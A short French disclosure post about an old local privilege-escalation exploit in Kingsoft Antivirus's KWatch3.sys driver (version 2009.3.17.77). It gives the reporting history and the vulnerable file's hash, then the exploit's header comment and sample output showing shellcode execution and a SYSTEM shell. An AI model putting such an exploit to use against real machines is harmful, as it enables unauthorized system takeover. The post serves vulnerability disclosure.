
Un exploit datant de plusieurs années ciblant une vulnérabilité locale d'élévation de privilèges (EoP) dans le pilote KWatch de Kingsoft Antivirus version 2009.3.17.77.
Un exploit vieux de plusieurs années d'une vulnérabilité d'élévation de privilèges locale (EoP) dans le pilote KWatch de Kingsoft Antivirus, version 2009.3.17.77.
J'ai signalé le problème en janvier 2014 et j'ai été informé du CVE plus de 8 ans plus tard. J'ai décidé de mettre ceci en ligne parce qu'il est assez amusant de retrouver mon ancien code et de voir que cela a pris autant de temps.
Ainsi, il ne doit pas s'agir d'une nouvelle vulnérabilité malgré le nouveau CVE -- une recherche rapide a déjà montré de multiples signalements pour la même vulnérabilité apparente.
Je remercie encore l'IPA pour son travail et pour avoir égayé ma journée.
Le fichier vulnérable semble être ffdedbaeccbcf0b697675b24ca313cbb8e1c9ba1bd2f0a0b58a2d6a04a038479
//
// Exploit for Kingsoft Antivirus KWatch Driver (KWatch3.sys)
// Target File Version: 2009.3.17.77
// Affected Product: Kingsoft Internet Security 9 Plus
//
/*
------------------------------------------------------------------------------
Shellcode is located at 7E7E7E7E.
The device was opened as 00000020.
Shellcode was executed.
The SYSTEM shell was launched.
This process will be suspended for ever.
------------------------------------------------------------------------------
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\user\Desktop>whoami
nt authority\system
------------------------------------------------------------------------------
*/